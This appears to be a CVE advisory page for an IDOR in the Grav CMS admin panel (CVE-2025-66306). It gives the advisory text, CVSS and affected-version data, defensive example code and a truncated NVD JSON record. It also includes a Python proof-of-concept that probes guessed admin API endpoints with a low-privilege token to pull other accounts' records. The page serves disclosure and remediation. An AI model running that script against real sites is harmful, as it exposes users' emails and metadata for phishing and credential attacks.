Security Vulnerability Report
CVE-2025-66306 CVSS 4.3 MEDIUM

Published: 2025-12-01 22:15:50
Last Modified: 2025-12-03 18:45:12

Description

Grav is a file-based Web platform. Prior to 1.8.0-beta.27, there is an IDOR (Insecure Direct Object Reference) vulnerability in the Grav CMS Admin Panel which allows low-privilege users to access sensitive information from other accounts. Although direct account takeover is not possible, admin email addresses and other metadata can be exposed, increasing the risk of phishing, credential stuffing, and social engineering. This vulnerability is fixed in 1.8.0-beta.27.
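The advisory describes the classic object-level authorization gap: an authenticated but low-privilege admin-panel user supplies another account's identifier and the server hands back that account's record. The following is an added example written for this page, not Grav's code: a vulnerable lookup beside a hardened one, so the missing check is concrete. The in-memory account store, the field names and the "admin.super" permission shape are assumptions made for the illustration; Grav's real account files and permission names differ.

```python
# Added example, not Grav's code: the object-level authorization gap behind an
# admin-panel IDOR, shown as a vulnerable lookup next to a hardened one.
# The account store, field names and the "admin.super" permission shape are
# assumptions made for this illustration; Grav's real account files differ.

# Constructed sample accounts, keyed by username the way a flat-file user
# store would be. "email" and "last_login" are the kind of metadata the
# advisory says leaks to low-privilege users.
ACCOUNTS = {
    "admin": {
        "email": "admin@example.invalid",
        "fullname": "Site Admin",
        "access": {"admin": {"super": True}},
        "last_login": "2025-11-30T08:12:00Z",
    },
    "editor": {
        "email": "editor@example.invalid",
        "fullname": "Content Editor",
        "access": {"admin": {"pages": True}},
        "last_login": "2025-11-28T17:40:00Z",
    },
}

# Fields that must never leave the server for anyone but the owner or an admin.
SENSITIVE_FIELDS = {"email", "last_login"}


class Forbidden(Exception):
    """Raised when the requester may not see the requested account."""


def has_super_admin(username: str) -> bool:
    """True when the account carries the (assumed) admin.super permission."""
    access = ACCOUNTS.get(username, {}).get("access", {})
    return bool(access.get("admin", {}).get("super"))


def get_account_vulnerable(requester: str, target: str) -> dict:
    """IDOR: the target key comes straight from the request. Only
    authentication is checked (the requester has an account); whether the
    requester is allowed to read *this* account is never asked."""
    if requester not in ACCOUNTS:
        raise Forbidden("login required")
    return dict(ACCOUNTS[target])


def get_account_fixed(requester: str, target: str) -> dict:
    """Object-level authorization: a user may read their own record, and
    super admins may read any. The check runs before the lookup, and a
    missing target raises the same error as a forbidden one, so the response
    cannot be used to enumerate which accounts exist."""
    if requester not in ACCOUNTS:
        raise Forbidden("login required")
    if requester != target and not has_super_admin(requester):
        raise Forbidden("not authorized for this account")
    if target not in ACCOUNTS:
        raise Forbidden("not authorized for this account")
    return dict(ACCOUNTS[target])


def public_profile(target: str) -> dict:
    """Minimal-disclosure view for places where every admin-panel user
    legitimately sees other users (author lists and the like): the
    sensitive fields are stripped server-side rather than hidden in the UI."""
    record = ACCOUNTS.get(target, {})
    return {k: v for k, v in record.items() if k not in SENSITIVE_FIELDS}


def is_denied(requester: str, target: str) -> bool:
    """Helper for exercising the hardened path: True if access is refused."""
    try:
        get_account_fixed(requester, target)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    # The low-privilege editor reads the admin's email through the IDOR ...
    print(get_account_vulnerable("editor", "admin")["email"])
    # ... and is refused by the hardened lookup.
    print("denied" if is_denied("editor", "admin") else "allowed")
```

The two points worth carrying over to any real fix: the authorization decision is made on the requester/target pair before the record is loaded, and the error for "account does not exist" is indistinguishable from "not yours", which closes the enumeration side channel that an IDOR on user records usually comes with.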

CVSS Details

Two CVSS 3.1 assessments are recorded for this CVE. They agree on every metric except confidentiality impact.

CVSS Score (Secondary, CNA-supplied)
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVSS Score (Primary, NVD analysis)
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Reading the vector: reachable over the network (AV:N), no special conditions (AC:L), an ordinary low-privilege admin-panel account is sufficient (PR:L), no victim interaction (UI:N), impact confined to the Grav application itself (S:U), and no integrity or availability impact. The 4.3 versus 6.5 gap is purely whether disclosure of other accounts' email addresses and metadata counts as a low or a high confidentiality loss. Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key).

Configurations (Affected Products)

Every CPE entry in the NVD configuration data for this CVE is marked VULNERABLE:

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE for versions from 1.7.48 (inclusive) up to, but excluding, 1.8.0
cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:* through cpe:2.3:a:getgrav:grav:1.8.0:beta26:*:*:*:*:*:* - VULNERABLE; each 1.8.0 beta before beta.27 is listed as its own CPE entry (beta1, beta2, beta3, ..., beta26)

In short: Grav CMS Admin Panel < 1.8.0-beta.27; fixed in 1.8.0-beta.27. The advisory text itself states no lower bound ("prior to 1.8.0-beta.27"); the 1.7.48 floor comes only from NVD's configuration, so treat older 1.7.x installs as unverified rather than as safe.
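Version range data like the above is easy to misapply, mainly because pre-release tags do not sort as strings ("beta.3" comes after "beta.27" lexically, and "1.8.0" sorts before "1.8.0-beta.27"). The block below is an added example, not part of the advisory or of the Grav project, that turns the NVD ranges into a concrete check. It assumes Grav's version is available as the GRAV_VERSION constant in system/defines.php; the regex that reads it and the sample file content are assumptions made for this example.

```python
# Added example, not part of the advisory or of Grav: map the affected-version
# data above onto a concrete "is this install affected?" check. Grav exposes its
# version as the GRAV_VERSION constant in system/defines.php; the regex that
# reads it and the sample file content are assumptions made for this example.
import re
from typing import Optional, Tuple

FIXED_IN = "1.8.0-beta.27"

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-beta\.?(\d+))?")
_DEFINE_RE = re.compile(r"define\(\s*'GRAV_VERSION'\s*,\s*'([^']+)'\s*\)")


def parse_version(version: str) -> Tuple[Tuple[int, int, int], Optional[int]]:
    """'1.8.0-beta.27' -> ((1, 8, 0), 27); '1.7.48' -> ((1, 7, 48), None).
    Only the release forms Grav actually uses are accepted."""
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised Grav version: {version!r}")
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    beta = int(m.group(4)) if m.group(4) else None
    return (major, minor, patch), beta


def sort_key(version: str):
    """Total order in which a beta precedes its final release and beta
    numbers compare as integers. Plain string comparison gets both wrong:
    '1.8.0-beta.3' > '1.8.0-beta.27' and '1.8.0' < '1.8.0-beta.27'."""
    core, beta = parse_version(version)
    return (core, 0, beta) if beta is not None else (core, 1, 0)


def is_fixed(version: str) -> bool:
    """True once the install is at or past the release that fixed this CVE."""
    return sort_key(version) >= sort_key(FIXED_IN)


def is_affected(version: str) -> bool:
    """Mirror the NVD configuration for this CVE: the stable range
    1.7.48 <= v < 1.8.0, plus every 1.8.0 beta before beta.27. Note the
    lower bound: a 1.6.x install is older than the fix but outside NVD's
    affected range, so is_affected() and is_fixed() are deliberately not
    complements of each other."""
    core, beta = parse_version(version)
    if beta is not None:
        return core == (1, 8, 0) and beta < 27
    return (1, 7, 48) <= core < (1, 8, 0)


def version_from_defines(php_source: str) -> str:
    """Pull GRAV_VERSION out of the text of system/defines.php."""
    m = _DEFINE_RE.search(php_source)
    if not m:
        raise ValueError("GRAV_VERSION not found in defines.php")
    return m.group(1)


# Constructed stand-in for the relevant line of system/defines.php.
SAMPLE_DEFINES = "<?php\n\ndefine('GRAV_VERSION', '1.8.0-beta.12');\n"


if __name__ == "__main__":
    # Real use: version_from_defines(open('system/defines.php').read())
    found = version_from_defines(SAMPLE_DEFINES)
    status = "affected" if is_affected(found) else "not affected"
    print(f"GRAV_VERSION {found}: {status}; fixed={is_fixed(found)}")
```

Run it against the real system/defines.php of each instance; the point of keeping is_affected() and is_fixed() separate is that a version below NVD's 1.7.48 floor reports "not affected" while still reporting "not fixed", which is the honest answer for an install the advisory does not cover.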

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66306 PoC - Grav CMS Admin Panel IDOR Vulnerability
# Description: Low-privilege users can access sensitive information from other accounts
# Affected: Grav CMS < 1.8.0-beta.27
#
# NOTE: the advisory names no specific route. The endpoint paths and the
# bearer-token Authorization header below are this script's own guesses and
# must be adapted to the real admin routes and session handling of the
# instance under test; a "hit" here is only evidence once the returned body
# is verifiably another account's data.
import argparse

import requests


def exploit_idor(target_url, low_priv_token, target_user_id):
    """Probe candidate admin endpoints for an IDOR on user records.

    Args:
        target_url: Base URL of the Grav CMS instance under test
        low_priv_token: Authentication token of a low-privilege account
        target_user_id: Identifier of the account whose record is requested
    """
    headers = {
        'Authorization': f'Bearer {low_priv_token}',
        'Content-Type': 'application/json',
    }
    # Candidate endpoints (guessed; not taken from the advisory)
    endpoints = [
        f'/api/users/{target_user_id}',
        f'/api/user/{target_user_id}',
        f'/admin/api/users/{target_user_id}',
    ]
    results = []
    for endpoint in endpoints:
        try:
            response = requests.get(f'{target_url.rstrip("/")}{endpoint}',
                                    headers=headers, timeout=10)
            if response.status_code == 200:
                try:
                    data = response.json()
                except ValueError:
                    # A 200 with a non-JSON body (for example a login page
                    # reached through a redirect) is not a disclosure.
                    print(f'[*] 200 but non-JSON body: {endpoint}')
                    continue
                results.append({
                    'endpoint': endpoint,
                    'status': 'VULNERABLE',
                    'data': data,
                })
                print(f'[+] VULNERABLE: {endpoint}')
                print(f'    Response: {data}')
            elif response.status_code == 403:
                print(f'[-] Protected: {endpoint}')
            else:
                print(f'[*] Unexpected status {response.status_code}: {endpoint}')
        except requests.RequestException as e:
            print(f'[!] Error accessing {endpoint}: {e}')
    return results


def main():
    parser = argparse.ArgumentParser(description='CVE-2025-66306 PoC')
    parser.add_argument('--url', required=True, help='Target Grav CMS URL')
    parser.add_argument('--token', required=True, help='Low-privilege user token')
    # Grav accounts are keyed by username (user/accounts/<username>.yaml),
    # so the identifier is taken as a string rather than forced to an int.
    parser.add_argument('--target-id', required=True,
                        help='Target user identifier (username)')
    args = parser.parse_args()

    print(f'[*] Targeting: {args.url}')
    print(f'[*] Attempting to access user ID: {args.target_id}')
    print('[*] Exploiting IDOR vulnerability...\n')

    results = exploit_idor(args.url, args.token, args.target_id)
    if results:
        print(f'\n[!] Successfully extracted data from {len(results)} endpoint(s)')
        print('[!] Extracted information may include:')
        print('    - Email addresses')
        print('    - User metadata')
        print('    - Profile information')
    else:
        print('\n[*] No vulnerable endpoints found')


if __name__ == '__main__':
    main()

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66306",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-01T22:15:50.413",
    "lastModified": "2025-12-03T18:45:11.970",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, there is an IDOR (Insecure Direct Object Reference) vulnerability in the Grav CMS Admin Panel which allows low-privilege users to access sensitive information from other accounts. Although direct account takeover is not possible, admin email addresses and other metadata can be exposed, increasing the risk of phishing, credential stuffing, and social engineering. This vulnerability is fixed in 1.8.0-beta.27."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.48", "versionEndExcluding": "1.8.0", "matchCriteriaId": "EAC8A2F1-9318-4224-9CF5-D3EFE16E81F4"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8A383F2E-C6BA-440B-B648-A3313B7D91C3"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*", "matchCriteriaId": "530C6F64-F30B-4E93-9A12-D9625EA57483"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*", "matchCriteriaId": "9AC28BF9-626D-4514-91F0-F81DAB5D3602"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*", "matchCriteriaId": "307AA375-E531-4AE5-BA79-2F9D4DE7A05F"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta14:*:*:*:*:*:*", "matchCriteriaId": "C2E3E312-485D-42B0-B465-64B6438CDCAE"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta15:*:*:*:*:*:*", "matchCriteriaId": "5BE4B2F9-1B6D-4D18-916A-5C95A3213222"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta16:*:*:*:*:*:*", "matchCriteriaId": "763207F0-92D1-4274-A30A-DE634C5852C3"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta17:*:*:*:*:*:*", "matchCriteriaId": "1DE8F350-BA07-4DAA-AE4B-5E0A532B6828"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta18:*:*:*:*:*:*", "matchCriteriaId": "F9150B94-0DF3-43F3-9806-39787A6C0E4D"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta19:*:*:*:*:*:*", "matchCriteriaId": "BAA7C7EC-8FB2-445D-8A02-1743D87F5416"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "7A6BEA2A-D534-4C9E-811A-8A46E214C46D"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta20:*:*:*:*:*:*", "matchCriteriaId": "7A644F57-FF39-4262-9796-7C4F3B0851C1"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta21:*:*:*:*:*:*", "matchCriteriaId": "B2AFB9E7-084E-497B-B0FC-CA6A5033C5BF"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta22:*:*:*:*:*:*", "matchCriteriaId": "5C5E8823-9083-4FFA-9897-CAD0340DCE68"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta23:*:*:*:*:*:*", "matchCriteriaId": "9C048938-E0EC-4AD0-9847-FD74E6770FE2"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta24:*:*:*:*:*:*", "matchCriteriaId": "F7B43876-1445-418A-9707-E692FDF62C4D"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta25:*:*:*:*:*:*", "matchCriteriaId": "94B209DE-01C6-41BA-B912-CF57849A9F7A"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta26:*:*:*:*:*:*", "matchCriteriaId": "AB53AA10-87A5-4010-8019-BF4AA5ABC12B"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "775E0913-F3EF-4A55-B162-5BF9C6E2E641"},
              {"vulnerable": ... (truncated)